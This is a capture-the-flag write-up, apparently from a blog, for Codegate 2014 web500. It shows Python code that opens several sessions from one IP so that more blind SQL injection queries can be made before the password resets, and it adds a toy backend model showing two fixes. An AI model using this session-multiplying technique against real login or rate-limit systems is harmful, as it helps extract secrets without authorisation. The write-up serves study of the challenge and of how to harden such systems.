Tuesday, February 25, 2014

Another way to solve Codegate 2014 web500

After reviewing the provided source code again, along with another write-up, I noted two interesting points:
  • The password is reset only when the session request count (cnt) reaches 120.
  • Only one password is stored in the DB per IP address, not per session ID.
Knowing that, ask yourself what happens if we have multiple sessions from a single IP. There is still only one password stored in the database for that IP, which gives us another way to defeat this challenge.
import urllib2
from cookielib import CookieJar

# challenge URL (from the description below)
url = "http://58.229.183.24/5a520b6b783866fd93f9dcdaf753af08/"

def GetCookie():
    # open a fresh session: a new CookieJar means a new PHPSESSID from the server
    cj = CookieJar()
    opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
    response = opener.open(url)
    content = response.read()
    # serialize the cookies we received into a Cookie header value
    cookie_string = ""
    for cookie in cj:
        cookie_string += ('%s=%s;' % (cookie.name, cookie.value))
    print "cookie: " + cookie_string
    return cookie_string

With only 4 parallel sessions we get 4*120 = 480 requests to the server, which is enough to recover the 30-character password with blind SQL injection.

session = []
for i in range(0, 4):
    # call GetCookie() so the list holds cookie strings, not the function object
    session.append(GetCookie())
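To make the budget argument concrete, here is an added toy model (not the challenge's real source and not the author's code) of the backend as described: a password bound to a key and a request counter bound to a key, with the reset at cnt 120. It counts how many round-robin requests from several sessions behind one IP see the same password before the first reset (119 per session rather than 120, since the 120th request is the one that triggers the reset), and then shows two hardened bindings: storing the password per session, or counting requests per IP. The key names, IP and session ids are constructed for the example.

```python
import secrets
from collections import defaultdict

RESET_AT = 120  # the challenge resets the password when a session's cnt reaches 120

class PasswordStore:
    """Toy model of the challenge backend (assumption, not the real source).
    key_by:   what the stored password is bound to ('ip' as observed, or 'session')
    count_by: what the request counter is bound to ('session' as observed, or 'ip')"""
    def __init__(self, key_by="ip", count_by="session"):
        self.key_by, self.count_by = key_by, count_by
        self.passwords = {}
        self.counts = defaultdict(int)
        self.resets = 0

    def request(self, ip, session_id):
        pw_key = ip if self.key_by == "ip" else session_id
        cnt_key = ip if self.count_by == "ip" else session_id
        if pw_key not in self.passwords:
            self.passwords[pw_key] = secrets.token_hex(15)  # 30 chars, like the challenge
        self.counts[cnt_key] += 1
        if self.counts[cnt_key] >= RESET_AT:
            # reset fires: the secret bound to pw_key is replaced
            self.passwords[pw_key] = secrets.token_hex(15)
            self.counts[cnt_key] = 0
            self.resets += 1
        return self.passwords[pw_key]

def usable_requests(store, ip="10.0.0.1", n_sessions=4):
    """Round-robin requests from n_sessions cookies behind one IP and count
    how many answers refer to the same password before the first reset,
    i.e. the number of oracle queries one secret is exposed to."""
    sessions = ["sess%d" % i for i in range(n_sessions)]
    target, usable = None, 0
    while store.resets == 0:
        for s in sessions:
            pw = store.request(ip, s)
            if store.resets:
                break
            if target is None:
                target = pw
            if pw == target:
                usable += 1
    return usable

if __name__ == "__main__":
    for key_by, count_by in [("ip", "session"), ("session", "session"), ("ip", "ip")]:
        n = usable_requests(PasswordStore(key_by, count_by))
        print("password per %-7s counter per %-7s -> %d requests on one password" % (key_by, count_by, n))
```

Either fix brings the budget back down to a single session's 119 requests, because the reset counter and the secret it protects are then bound to the same thing.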

Codegate 2014 Web 500 Writeup

Description
==========================================
http://58.229.183.24/5a520b6b783866fd93f9dcdaf753af08/

http://58.229.183.24/5a520b6b783866fd93f9dcdaf753af08/index.phps

==========================================